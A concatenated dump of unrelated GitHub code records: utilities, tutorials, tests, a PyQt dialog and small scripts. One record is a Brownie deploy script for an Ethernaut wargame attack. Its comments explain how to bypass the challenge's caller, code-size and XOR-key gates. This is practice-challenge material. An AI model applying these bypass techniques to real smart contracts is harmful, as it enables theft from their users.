img2.to(device)\n\n\n    lpips_distance = loss_fn(img1, img2).item()\n\n    return lpips_distance\n","repo_name":"williamdevena/Image_Super_Resolution","sub_path":"utils/metrics.py","file_name":"metrics.py","file_ext":"py","file_size_in_byte":2736,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2600004246","text":"#!/usr/local/bin/python3\n#Open the file named data.txt in Write Mode\nfile1 = open(\"data.txt\",\"w\") \ndata = list()\n\n#select the amount of data one needs to write\n#redis_key : your Redis hash to insert into\n#redis_subkey : key name\n#redis_subvalue : value that belongs to the key\nfor i in range(100):\n\tdata.append(\"HSET redis_key \"+str(i)+\"redis_subkey redis_subvalue \\n\")\n\nfile1.writelines(data) \nfile1.close()\n
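\n# Usage sketch (assumes redis-cli is available): stream the generated commands into Redis,\n# e.g. cat data.txt | redis-cli --pipe\n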
","repo_name":"willsc/redis-enterprise","sub_path":"redismassdata.py","file_name":"redismassdata.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12615767262","text":"# Assignment 10.1 - File Processing\r\n# CIS 245 - Michael Montana\r\n# 20 February 2022\r\n# =================================================================================================================================================================================\r\n# This week we will create a program that performs file processing activities.\r\n# Your program this week will use the OS library in order to validate that a directory exists before creating a file in that directory.\r\n# Your program will prompt the user for the directory they would like to save the file in as well as the name of the file.\r\n# The program should then prompt the user for their name, address, and phone number.\r\n# Your program will write this data to a comma separated line in a file and store the file in the directory specified by the user.\r\n# Once the data has been written your program should read the file you just wrote to the file system and display the file contents to the user for validation purposes.\r\n# Submit a link to your Github repository.\r\n# ================================================================================================================================================================================\r\nimport os\r\nyeslist = ['y', 'ye', 'yes', '']\r\n\r\n\r\ndef openWrite(fileComp, userName, address, phoneNum):  # open and write file\r\n    with open(fileComp, 'w')as fileHandle:\r\n        fileHandle.write('{}, {}, {}'.format(userName, address, phoneNum))\r\n    print('You\'ve written the following text to the file:\n')\r\n\r\n\r\ndef openRead(fileComp):  # open and read file\r\n    with open(fileComp, 'r') as fileHandle:\r\n        fileRead = fileHandle.read()\r\n    print(fileRead)\r\n\r\n\r\n# open and append on the next line of a file\r\ndef openAppend(fileComp, userName, address, phoneNum):\r\n    with open(fileComp, 'a')as fileHandle:\r\n        fileHandle.write('\\n{}, {}, {}'.format(userName, address, phoneNum))\r\n    print('You\'ve appended the following text to the file:\n')\r\n\r\n\r\ndef fileUpdate(fileComp, userName, address, phoneNum, oaChoice):\r\n    if oaChoice == '1':\r\n        openWrite(fileComp, userName, address, phoneNum)\r\n        openRead(fileComp)\r\n    else:\r\n        openAppend(fileComp, userName, address, phoneNum)\r\n        openRead(fileComp)\r\n\r\n\r\ndef fileInfo():\r\n    filePath = input(\r\n        '\\nPlease provide the directory you would like the file stored: ')\r\n    # if dir does not exist loop for another input\r\n    if os.path.isdir(filePath) is False:\r\n        while os.path.isdir(filePath) is False:\r\n            filePath = input(\r\n                'The provided directory does not exist. 
Please provide a valid directory: ')\r\n    else:\r\n        print('\\nYour Directory was found.')\r\n    fileName = '\\\\' + input('\\nPlease provide a file name:')+'.txt'\r\n    fileComp = filePath + fileName\r\n    return fileComp\r\n\r\n\r\ndef user():\r\n    userName = input('Please enter your name: ')\r\n    address = input('Please enter your address: ')\r\n    phoneNum = input('Please enter your phone number: ')\r\n    return userName, address, phoneNum\r\n\r\n\r\ndef main():\r\n    moreFiles = 'yes'\r\n    while moreFiles in yeslist:\r\n        print(str('This program stores/appends user information to a text file').center(100, '_') + ('\\n'))\r\n        print('\\nPlease provide the following:\\n')\r\n        userName, address, phoneNum = user()\r\n        fileComp = fileInfo()\r\n        if os.path.exists(fileComp):\r\n            print('\\nThe file already exists, and contains the following:')\r\n            openRead(fileComp)\r\n            oaChoice = input(\r\n                '\\nSelect one of the following options:\\n[1] Overwrite File\\n[2] Append to File\\n')\r\n            while oaChoice != '1' and oaChoice != '2':\r\n                oaChoice = input(\r\n                    '\\nChoose 1 to Overwrite File; or 2 to Append to File:')\r\n            fileUpdate(fileComp, userName, address, phoneNum, oaChoice)\r\n        else:\r\n            oaChoice = '1'\r\n            print('\\nYou are creating a new file.\\n')\r\n            fileUpdate(fileComp, userName, address, phoneNum, oaChoice)\r\n        moreFiles = input(\r\n            '\\nWould you like to add user information to additional files (yes/no)?\\n')\r\n\r\n\r\nif __name__ == \"__main__\":\r\n    main()\r\n","repo_name":"StrangerBeneath/CIS245","sub_path":"Assignment 10.1 File Processing - Montana.py","file_name":"Assignment 10.1 File Processing - Montana.py","file_ext":"py","file_size_in_byte":4203,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33365894637","text":"from scripts.helpful_scripts import get_account\nfrom brownie import web3, interface, Attack14\n\n\nETHERNAUT_INSTANCE = \"0xc47e9de2c5a85084f777f94C926585ea49490E1a\"\nPLAYER = \"0xF8f8269488f73fab3935555FCDdD6035699deE25\"\nGAS_LIMIT = 6000000\n\n\ndef main():\n\n    player = get_account()\n    Attack14.deploy(\n        ETHERNAUT_INSTANCE,\n        {\"from\": player, \"gas_limit\": GAS_LIMIT, \"allow_revert\": True},\n    )\n\n\n# Gate One: deploy proxy contract (conflict with Gate Two) <-- PROBLEM_1\n\n\n# Gate Two: Require that the 'codesize' (in bytes) of the code at the call address\n# is equal to zero. So caller needs to have zero code size\n#\n# --> unless the call is made from the constructor of a smart contract <-- SOLVED_1\n\n\n# Gate Three:\n#\n# uint64(bytes8(keccak256(abi.encodePacked(msg.sender)))) XOR uint64(_gateKey)\n# = type(uint64).max\n\n\n# uint64 gateKey = uint64(bytes8(keccak256(abi.encodePacked(address(this))))) ^ type(uint64).max\n#\n# where address(this) is the address of the attack contract that is \"in the process\" of being deployed\n","repo_name":"sarobinson2011/ethernaut-brownie","sub_path":"scripts/14-scripts/14-deploy_attack.py","file_name":"14-deploy_attack.py","file_ext":"py","file_size_in_byte":1051,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18699664938","text":"\"\"\"\nError handling in Python\n\nIn Python, we use try/except blocks to handle errors or exceptions that can arise while a program is running. 
\n\nWe can handle different types of errors by specifying a separate except block for each error type.\n\"\"\"\n\n# Basic example of error handling\ntry:\n    # we try to divide by zero, which will raise an error\n    x = 1 / 0\nexcept ZeroDivisionError:\n    print(\"Error: Division by zero.\")\n\n# We can also handle multiple errors. Here we will try to convert a string to a number\ntry:\n    # we try to convert a string to a number, which will raise an error\n    y = int(\"Hola Mundo\")\nexcept ValueError:\n    print(\"Error: The string cannot be converted to a number.\")\n\n# We can use a 'finally' block to run code regardless of whether an error occurred\ntry:\n    # we try to divide by zero again\n    x = 1 / 0\nexcept ZeroDivisionError:\n    print(\"Error: Division by zero.\")\nfinally:\n    print(\"This is printed regardless of whether an error occurred.\")\n\n# We can also raise our own errors with the 'raise' keyword\ntry:\n    # we raise an error with a custom message\n    raise ValueError(\"This is a custom error.\")\nexcept ValueError as e:\n    print(f\"Error: {e}\")\n","repo_name":"apholdings/Ciencia_de_Datos_con_Python","sub_path":"1) Programacion Python/errores.py","file_name":"errores.py","file_ext":"py","file_size_in_byte":1325,"program_lang":"python","lang":"es","doc_type":"code","stars":11,"dataset":"github-code","pt":"37"} +{"seq_id":"31447537344","text":"from typing import Any, Dict, List, Type, TypeVar\n\nimport attr\n\nT = TypeVar(\"T\", bound=\"Link\")\n\n\n@attr.s(auto_attribs=True)\nclass Link:\n    \"\"\"\n    Attributes:\n        url (str): Example: http://url.\n        name (str): Example: link.\n    \"\"\"\n\n    url: str\n    name: str\n    additional_properties: Dict[str, Any] = attr.ib(init=False, factory=dict)\n\n    def to_dict(self) -> Dict[str, Any]:\n        url = self.url\n        name = self.name\n\n        field_dict: Dict[str, Any] = {}\n        field_dict.update(self.additional_properties)\n        field_dict.update(\n            {\n                \"url\": url,\n                \"name\": name,\n            }\n        )\n\n        return field_dict\n\n    @classmethod\n    def from_dict(cls: Type[T], src_dict: Dict[str, Any]) -> T:\n        d = src_dict.copy()\n        url = d.pop(\"url\")\n\n        name = d.pop(\"name\")\n\n        link = cls(\n            url=url,\n            name=name,\n        )\n\n        link.additional_properties = d\n        return link\n\n    @property\n    def additional_keys(self) -> List[str]:\n        return list(self.additional_properties.keys())\n\n    def __getitem__(self, key: str) -> Any:\n        return self.additional_properties[key]\n\n    def __setitem__(self, key: str, value: Any) -> None:\n        self.additional_properties[key] = value\n\n    def __delitem__(self, key: str) -> None:\n        del self.additional_properties[key]\n\n    def __contains__(self, key: str) -> bool:\n        return key in self.additional_properties\n","repo_name":"truehostcloud/artifact-hub-client","sub_path":"artifact_hub_client/models/link.py","file_name":"link.py","file_ext":"py","file_size_in_byte":1486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"43389590594","text":"import fauxfactory\nimport pytest\n\nfrom hansei import config\nfrom hansei.koku_models import KokuCustomer, KokuProvider, KokuServiceAdmin, KokuUser\n\n\n@pytest.mark.smoke\nclass TestUserCrud(object):\n    @pytest.fixture(scope='class')\n    def service_admin(self):\n        koku_config = config.get_config().get('koku', {})\n\n        return KokuServiceAdmin(\n            username=koku_config.get('username'), password=koku_config.get('password'))\n\n    @pytest.fixture(scope='class')\n    def customer(self, service_admin):\n        
\"\"\"Create a new Koku customer with random info\"\"\"\n uniq_string = fauxfactory.gen_string('alphanumeric', 8)\n name = 'Customer {}'.format(uniq_string)\n owner = {\n 'username': 'owner_{}'.format(uniq_string),\n 'email': 'owner_{0}@{0}.com'.format(uniq_string),\n 'password': 'redhat', }\n\n #TODO: Implement lazy authentication of the client for new KokuObject()\n customer = service_admin.create_customer(name=name, owner=owner)\n customer.login()\n assert customer.uuid, 'No customer uuid created for customer'\n\n yield customer\n\n service_admin.delete_customer(customer.uuid)\n\n @pytest.fixture(scope='class')\n def user(self, customer):\n \"\"\"Create a new Koku user without authenticating to the server\"\"\"\n uniq_string = fauxfactory.gen_string('alphanumeric', 8)\n\n #TODO: Implement lazy authentication of the client for new KokuObject() fixtures\n user = customer.create_user(\n username='user_{}'.format(uniq_string),\n email='user_{0}@{0}.com'.format(uniq_string),\n password='redhat')\n\n user.login()\n yield user\n\n customer.delete_user(user.uuid)\n\n @pytest.fixture(scope='class')\n def provider(self, user):\n \"\"\"Create a new KokuProvder\"\"\"\n uniq_string = fauxfactory.gen_string('alphanumeric', 8)\n #Grab the first AWS provider\n provider_config = [\n prov for prov in config.get_config().get('providers', {}) if prov['type'] == 'AWS'][0]\n\n #TODO: Implement lazy authentication of the client for new KokuObject() fixtures\n provider = user.create_provider(\n name='Provider {} for user {}'.format(uniq_string, user.username),\n authentication=provider_config.get('authentication'),\n provider_type=provider_config.get('type'),\n billing_source=provider_config.get('billing_source'))\n\n return provider\n\n def test_provider_create(self, provider):\n \"\"\"Create a new provider\"\"\"\n\n # All requests will throw an exception if response is an error code\n assert provider.uuid, 'No uuid created for provider'\n\n def test_provider_read(self, provider, user):\n \"\"\"Read the provider data from the server\"\"\"\n server_provider = user.read_provider(provider.uuid)\n\n # TODO: Overload equivalence for KokuObjects\n assert server_provider.uuid == provider.uuid, 'Provider info cannot be read from the server'\n\n provider_list = user.list_providers()\n assert len(provider_list) > 0, 'No providers available on server'\n\n provider_uuid_list = [provider.uuid for provider in provider_list]\n assert provider.uuid in provider_uuid_list, 'Provider uuid is not listed in the Koku server list'\n\n\n @pytest.mark.skip(reason=\"User update not implemented\")\n def test_provider_update(self):\n \"\"\"Update an existing provider\"\"\"\n assert 0\n\n def test_provider_delete(self, provider, user):\n \"\"\"Delete the provider from the server\"\"\"\n user.delete_provider(provider.uuid)\n provider_list = user.list_providers()\n\n for server_provider in provider_list:\n assert server_provider.uuid != provider.uuid, \"User was not deleted from the koku server\"\n","repo_name":"nachandr/hansei","sub_path":"hansei/tests/api/v1/test_provider.py","file_name":"test_provider.py","file_ext":"py","file_size_in_byte":3835,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3382256339","text":"\"\"\"\nYou are given two arrays (without duplicates) nums1 and nums2 where nums1’s\nelements are subset of nums2.Find all the next greater numbers for nums1's\nelements in the corresponding places of nums2.\n\nThe Next Greater Number of a number x in nums1 is the 
first greater number to\nits right in nums2. If it does not exist, output -1 for this number.\n\nExample:\nInput: nums1 = [4,1,2], nums2 = [1,3,4,2].\nOutput: [-1,3,-1]\nExplanation:\n    1) For number 4 in the first array, you cannot find the next greater number\n    for it in the second array, so output -1.\n    2) For number 1 in the first array, the next greater number for it in the\n    second array is 3.\n    3) For number 2 in the first array, there is no next greater number for it\n    in the second array, so output -1.\n\"\"\"\n\nclass Solution(object):\n\n    def nextGreaterElement(self, findNums, nums):\n        \"\"\"\n        :type findNums: List[int]\n        :type nums: List[int]\n        :rtype: List[int]\n        \"\"\"\n        l1 = len(findNums)  # nums1\n        l2 = len(nums)  # nums2\n        out = []\n        for i in range(l1):\n            n = findNums[i]\n            begin = nums.index(n)\n            if n >= max(nums[begin:l2]):  # if there is no greater value\n                out.append(-1)  # append -1\n            else:\n                for j in range(begin, l2):  # if there is greater value\n                    if n < nums[j]:\n                        out.append(nums[j])  # append the 1st greater value\n                        break  # then break the loop\n        return out\n\nif __name__ == '__main__':\n    print(Solution().nextGreaterElement([4,1,2],[1,3,4,2]))\n","repo_name":"dawnyoung/LeetCode","sub_path":"496-NextGreaterElement1.py","file_name":"496-NextGreaterElement1.py","file_ext":"py","file_size_in_byte":1666,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38165710121","text":"\nfrom dataclasses import dataclass\nfrom typing import Any, List\n\n# Note: AudioClassifierSet, ContentMetadata and the from_list/from_str/to_class helpers are\n# assumed to come from the package's shared (quicktype-style) serialization module.\n\n@dataclass\nclass CreateTrackRequest:\n    classifier_sets: List[AudioClassifierSet]\n    file: Any\n    metadata: ContentMetadata\n    title: str\n\n    @staticmethod\n    def from_dict(obj: Any) -> 'CreateTrackRequest':\n        assert isinstance(obj, dict)\n        classifier_sets = from_list(AudioClassifierSet.from_dict, obj.get(\"classifierSets\"))\n        file = obj.get(\"file\")\n        metadata = ContentMetadata.from_dict(obj.get(\"metadata\"))\n        title = from_str(obj.get(\"title\"))\n        return CreateTrackRequest(classifier_sets, file, metadata, title)\n\n    def to_dict(self) -> dict:\n        result: dict = {}\n        result[\"classifierSets\"] = from_list(lambda x: to_class(AudioClassifierSet, x), self.classifier_sets)\n        result[\"file\"] = self.file\n        result[\"metadata\"] = to_class(ContentMetadata, self.metadata)\n        result[\"title\"] = from_str(self.title)\n        return result\n
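\n# Round-trip sketch (hypothetical payload): for a dict d with 'classifierSets', 'file',\n# 'metadata' and 'title' keys, CreateTrackRequest.from_dict(d).to_dict() should equal d.\n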
","repo_name":"aidanmckenna/content_management","sub_path":"tracks/service/requests.py","file_name":"requests.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30499003091","text":"from django.shortcuts import render\n\nfrom .models import InstagramImage, Accueil_1Entete, Accueil_2Entete, PhotosProfessionnelle, PhotosPackshot, PhotosNature, PhotosBabyShoot, PhotosMariage, PhotosSeancesShooting, Suggestion, ImagePub, NosServiceAccueil,ImagePage1, ImagePage2, ImagePage3\n\n\nfrom .formulaire import SuggestionForm, ReservationForm\n#==========================page accueil==============================\ndef index(request):\n    exinst = InstagramImage.objects.all()\n    entete1 = Accueil_1Entete.objects.all()\n    entete2 = Accueil_2Entete.objects.all()\n\n    album1 = PhotosProfessionnelle.objects.all()\n    album2 = PhotosPackshot.objects.all()\n    album3 = PhotosNature.objects.all()\n    album4 = PhotosBabyShoot .objects.all()\n    album5 = PhotosMariage .objects.all()\n    album6 = PhotosSeancesShooting.objects.all()\n\n    return render(request, \"Pages/index.html\", {'insta':exinst, 'tete1':entete1, 'tete2':entete2, 'alb1':album1, 'alb2':album2, 'alb3':album3, 'alb4':album4, 'alb5':album5, 'alb6':album6, 'pub':ImagePub.objects.all(), 'service':NosServiceAccueil.objects.all(),'message':Suggestion.objects.all()})\n\n#===========================page contact==============================\ndef contact(request):\n    exinst = InstagramImage.objects.all()\n    form = ReservationForm()\n    if request.method == \"POST\":\n        ReservationForm(request.POST).save()\n        form = ReservationForm()\n\n    return render(request, \"Pages/contact.html\", {'form' : form , 'insta':exinst, 'back':ImagePage1.objects.all()})\n\n#===========================page galerie==============================\ndef galerie(request):\n\texinst = InstagramImage.objects.all()\n\n\n\talbum1 = PhotosProfessionnelle.objects.all()\n\talbum2 = PhotosPackshot.objects.all()\n\talbum3 = PhotosNature.objects.all()\n\talbum4 = PhotosBabyShoot .objects.all()\n\talbum5 = PhotosMariage .objects.all()\n\talbum6 = PhotosSeancesShooting.objects.all()\n\treturn render(request, \"Pages/galerie.html\", {'insta':exinst, 'alb1':album1, 'alb2':album2, 'alb3':album3, 'alb4':album4, 'alb5':album5, 'alb6':album6, 'back':ImagePage2.objects.all()})\n\n#===========================page a_propos==============================\ndef a_propos(request):\n    form = SuggestionForm()\n    if request.method == \"POST\":\n        SuggestionForm(request.POST).save()\n        form = SuggestionForm()\n    exinst = InstagramImage.objects.all()\n    return render(request, \"Pages/a_propos.html\", {'insta':exinst, 'Sug':form, 'back':ImagePage3.objects.all(),'img1':ImagePage2.objects.all(),'img2':ImagePage3.objects.all()})\n\n","repo_name":"NED-dev-2020/NED_service","sub_path":"ex_service/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"34662983209","text":"from PyQt5.QtWidgets import (QDialog, QGridLayout, QHBoxLayout,\n                             QPushButton, QSizePolicy, QSpacerItem)\nfrom PyQt5.QtCore import Qt\nfrom PyQt5.QtGui import QIcon\n\nfrom ..widgets.device_select import DeviceSelectWidget\nfrom ..widgets.device_config import DeviceConfigWidget\n\nclass DeviceListConfigDialog(QDialog):\n    def __init__(self, mrc, parent=None):\n        super().__init__(parent)\n        self.setWindowTitle(\"Configure Device\")\n        self.mrc = mrc\n        self.layout = QGridLayout()\n\n        self.selected_device = None\n        self.device_select_widget = DeviceSelectWidget(mrc, \"DM\")\n        self.layout.addWidget(self.device_select_widget, 0, 0)\n\n        self.config_widget = DeviceConfigWidget(mrc)\n        self.config_widget.config_changed.connect(self.config_changed)\n        self.layout.addWidget(self.config_widget, 0, 1)\n\n        self.button_layout = QHBoxLayout()\n        button_spacer = QSpacerItem(1, 1, QSizePolicy.Expanding,\n                                    QSizePolicy.Fixed)\n        self.button_layout.addItem(button_spacer)\n\n        self.cancel_button = QPushButton(\"Cancel\")\n        self.cancel_button.setIcon(QIcon(\":/delete.png\"))\n        self.cancel_button.setSizePolicy(QSizePolicy(QSizePolicy.Fixed,\n                                                     QSizePolicy.Fixed))\n        self.cancel_button.setFocusPolicy(Qt.NoFocus)\n        self.cancel_button.clicked.connect(self.close)\n        self.button_layout.addWidget(self.cancel_button, Qt.AlignRight)\n\n        self.submit_button = QPushButton(\"Apply\")\n        self.submit_button.setIcon(QIcon(\":/checkmark.png\"))\n        self.submit_button.setSizePolicy(QSizePolicy(QSizePolicy.Fixed,\n                                                     QSizePolicy.Fixed))\n        self.submit_button.setFocusPolicy(Qt.NoFocus)\n        self.submit_button.clicked.connect(self.submit)\n        self.button_layout.addWidget(self.submit_button, Qt.AlignRight)\n\n        self.layout.addLayout(self.button_layout, 1, 1)\n        
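# Apply starts out disabled; config_changed() re-enables it once the user edits a value\n        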
self.submit_button.setEnabled(False)\n\n self.setLayout(self.layout)\n\n self.device_select_widget.device_selected.connect(self.device_selected)\n self.config_widget.config_changed.connect(self.config_changed)\n\n def device_selected(self, device):\n self.submit_button.setEnabled(False)\n self.selected_device = device\n self.config_widget.prepare_config_list(device)\n\n def config_changed(self):\n self.submit_button.setEnabled(True)\n self.submit_button.clearFocus()\n self.config_widget.setFocus()\n\n def submit(self):\n self.config_widget.submit()\n self.close()\n\n","repo_name":"CasperVector/mamba-ose","sub_path":"mamba/gengyd/dialogs/device_list_config.py","file_name":"device_list_config.py","file_ext":"py","file_size_in_byte":2662,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29896297673","text":"from pathlib import Path\n\n\nclass Task():\n def __init__(self, id, name, completed=False):\n '''\n Task model\n\n :param id: integer\n\n :param name:str\n\n :param completed: str\n '''\n self.name = name\n self.completed = completed\n self.id = id\n","repo_name":"cruzortiz99/basics-python-flask-course","sub_path":"to-do-list/src/models/task.py","file_name":"task.py","file_ext":"py","file_size_in_byte":300,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5423355545","text":"import sys, sched, time\n\nclass Timer(object):\n\n def __init__(self, minutes):\n self.schedule = sched.scheduler(time.time, time.sleep)\n self.minutes = minutes\n\n def _times_up(self):\n sys.stdout.write('Timer of ' + str(self.minutes) + ' minutes is up!')\n\n def run(self):\n self.schedule.enter(60 * self.minutes, 1, self._times_up, ())\n self.schedule.run()\n\n\nquery = int(\"{query}\")\n\nif query > 120:\n query = 120\n\ntimer = Timer(query)\ntimer.run()\n","repo_name":"bearzk/alfred-workflows","sub_path":"timer/src/timer.py","file_name":"timer.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24046817413","text":"# handlers\nfrom django.urls import path\n\nfrom .views import LoginAPIView, ProfileAPIView, RegistrationAPIView\n\napp_name = 'users'\nurlpatterns = [\n path('sign-up/', RegistrationAPIView.as_view()),\n path('sign-in/', LoginAPIView.as_view()),\n path('profile/', ProfileAPIView.as_view())\n]\n","repo_name":"alikud/django_temlate_with_jwt","sub_path":"users/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"4067630581","text":"import numpy as np\nimport collections\n\nfrom crystal_system import cubic\nfrom src.pymatgen_wrappers import cif_parser_wrapper\nfrom src.utils import Set\nfrom src import qcore_input_strings as qcore_input\nfrom src.run_qcore import run_qcore\n\nfrom energy_vs_volume import ev_functions\n\n\n# MgO, NaCl, Si, Diamond (carbon), Ge (although could be an issue)\n# Add in a few more\n\ndef magnesium_oxide():\n file_name = '../' + cubic.conventional_fcc_cifs['magnesium_oxide'].file\n crystal = cif_parser_wrapper(file_name, fractional=True, is_primitive_cell=False, bravais='cubic')\n\n unit = ev_functions.get_position_unit(crystal)\n lattice_constant_factors = np.linspace(0.8, 1.2, 21, endpoint=True)\n lattice_constants = ev_functions.cubic_lattice_constants(crystal, lattice_constant_factors)\n\n named_result = 'mgo_volume'\n 
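# xTB settings: distance cutoffs in bohr, a 2x2x2 Monkhorst-Pack k-grid and the SCC solver;\n    # the inline comments note which values are converged\n    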
settings = collections.OrderedDict([\n        ('h0_cutoff', Set(40, 'bohr')),\n        ('overlap_cutoff', Set(40, 'bohr')),\n        ('repulsive_cutoff', Set(40, 'bohr')),\n        # Ewald setting for hard-cutoff of potential at 30 bohr\n        ('ewald_real_cutoff', Set(40, 'bohr')),\n        # Converged w.r.t. real-space value\n        ('ewald_reciprocal_cutoff', Set(10)),\n        ('ewald_alpha', Set(0.5)),\n        ('monkhorst_pack', Set([2, 2, 2])),\n        ('symmetry_reduction', Set(True)),\n        ('temperature', Set(0, 'kelvin')),\n        ('solver', Set('SCC'))\n    ])\n\n    total_energies = np.zeros(shape=(lattice_constant_factors.size))\n    for i,al in enumerate(lattice_constants):\n        lattice_factor = lattice_constant_factors[i]\n        crystal['lattice_parameters']['a'] = Set(al, unit)\n        input_string = qcore_input.xtb_input_string(crystal, settings, named_result=named_result)\n        output = run_qcore(input_string)\n        if not output:\n            print('No result:', lattice_factor)\n        else:\n            total_energies[i] = output[named_result]['energy']\n            # 4.19 ang is exp. See \"Ab initio determination of the bulk properties of Mgo\"\n            print(lattice_factor, al, output[named_result]['energy'])\n\n    return lattice_constant_factors, total_energies\n","repo_name":"AlexBuccheri/QcoreUtils","sub_path":"energy_vs_volume/crystal_inputs.py","file_name":"crystal_inputs.py","file_ext":"py","file_size_in_byte":2224,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"}
+{"seq_id":"3209881139","text":"# Less than 17, advise to \"Hit\"\n# Greater than or equal to 17, but less than 21, advise to \"Stay\"\n# Exactly 21, advise \"Blackjack!\"\n# Over 21, advise \"Already Busted\"\n\n# create card_total dict\ncard_total = {'1': 1, '2': 2, '3': 3, '4': 4, '5': 5, '6': 6, '7': 7, '8': 8, '9': 9, '10': 10, 'J': 10, 'Q': 10, 'K': 10, 'A': 1}\n\n# define blackjack_advice\ndef blackjack_advice(x, y, z):\n    total = card_total[x] + card_total[y] + card_total[z]  # named total to avoid shadowing the built-in sum()\n    # advise user based on their card total\n    if total < 17:\n        advice = f\"\\n{total} Hit!\\n\"\n    elif 21 > total >= 17:\n        advice = f\"\\n{total} Stay.\\n\"\n    elif total == 21:\n        advice = f\"\\n{total} Blackjack!\\n\"\n    else:\n        advice = f\"\\n{total} Already Busted.\\n\"\n    return advice\n\n# welcome user to blackjack advice program\nprint(\"\\nWelcome to the Blackjack Advice program!\")\n\n# prompt user for their cards\nfirst_card = input(\"\\nWhat's your first card?: \").upper()\nsecond_card = input(\"\\nWhat's your second card?: \").upper()\nthird_card = input(\"\\nWhat's your third card?: \").upper()\n\n# print / call blackjack_advice function / advise user\nprint(blackjack_advice(first_card, second_card, third_card))\n","repo_name":"PdxCodeGuild/class_llama","sub_path":"code/Eric/Lab19_Blackjack_Advice.py","file_name":"Lab19_Blackjack_Advice.py","file_ext":"py","file_size_in_byte":1164,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"27527671966","text":"import re\nfrom onlinesimru import NumbersService\n\n\nclass RentPhoneForSMS:\n    \"\"\" Retrieves phone number via API from onlinesimru \"\"\"\n\n    service = NumbersService('')\n\n    def get_phone_number(self) -> tuple:\n        \"\"\" Returns new number and its tzid \"\"\"\n\n        new_number = self.service.get('Yandex', country=77, number=True)\n        return new_number['number'], new_number['tzid']\n\n    def get_phone_code(self, tzid: int):\n        \"\"\" Waits and returns code which has been sent to phone \"\"\"\n\n        code = self.service.wait_code(tzid, timeout=10)\n\n        # keep only the digits of the received code\n        return re.sub(r'[^0-9]', '', code)\n","repo_name":"chimchimster/yandex_accounts_registrator","sub_path":"phone_number_getter.py","file_name":"phone_number_getter.py","file_ext":"py","file_size_in_byte":600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"23689246412","text":"from libcloud.storage.types import Provider\nfrom libcloud.storage.providers import get_driver\n\ncls = get_driver(Provider.AZURE_BLOBS)\n\ndriver = cls(\n    key=\"your storage account name\",\n    secret=\"your service principal secret key\",\n    tenant_id=\"your tenant id\",\n    identity=\"your service principal application id\",\n    auth_type=\"azureAd\",\n)\n","repo_name":"apache/libcloud","sub_path":"docs/examples/storage/azure/instantiate_azure_ad.py","file_name":"instantiate_azure_ad.py","file_ext":"py","file_size_in_byte":367,"program_lang":"python","lang":"en","doc_type":"code","stars":1969,"dataset":"github-code","pt":"37"}
+{"seq_id":"29775589360","text":"'''\r\nAuthor: Luke Olson\r\nUses the sentence transformer library to calculate the cosine similarity between\r\n2 given text files\r\n'''\r\nfrom sentence_transformers import SentenceTransformer, util\r\nfrom nltk import sent_tokenize\r\nfrom pandas import DataFrame\r\nfrom plotly.express import line\r\nimport glob\r\nimport torch\r\n\r\nSAMPLE_DIR = '../nanoGPT/out-fantasy'\r\nINPUT_DIR = '../data/American fantasy films.txt'\r\n\r\ndef findSimilarity(inPath, outPath):\r\n    # gather scripts\r\n    inScript = open(inPath, mode = 'r', encoding ='utf-8')\r\n    outScript = open(outPath, mode = 'r', encoding ='utf-8')\r\n\r\n    # tokenize (use download('punkt') during first run)\r\n\r\n    inSentences = sent_tokenize(inScript.read())\r\n    outSentences = sent_tokenize(outScript.read())\r\n\r\n    # create model\r\n    model = SentenceTransformer('all-MiniLM-L6-v2')\r\n\r\n    #Compute embedding for both lists\r\n    embeddings1 = model.encode(inSentences, convert_to_tensor=True)\r\n    embeddings2 = model.encode(outSentences, convert_to_tensor=True)\r\n\r\n    #Compute cosine-similarities\r\n    cos_sim = util.cos_sim(embeddings1, embeddings2)\r\n\r\n    mean = torch.mean(cos_sim).item()\r\n    print('mean similarity: ', mean)\r\n\r\n    return mean\r\n\r\ndef plot(data):\r\n    df = DataFrame(data)\r\n    fig = line(df, x='iter', y='similarities', title='Similarity to Original Dataset Over Iterations')\r\n    fig.show()\r\n\r\nif __name__ == '__main__':\r\n    # nltk.download('punkt')\r\n    data = { 'iter': [], 'similarities': [] }\r\n    extract_number = lambda s: int(''.join(filter(str.isdigit, s)))\r\n    for filePath in sorted(glob.glob(f'{SAMPLE_DIR}/*.txt'), key=extract_number):\r\n        print(filePath)\r\n        similarities = findSimilarity(INPUT_DIR, filePath)\r\n        data['iter'].append(extract_number(filePath))\r\n        data['similarities'].append(similarities)\r\n    plot(data)","repo_name":"abusch8/PlotBot","sub_path":"evaluation/sentence_similarity.py","file_name":"sentence_similarity.py","file_ext":"py","file_size_in_byte":1825,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
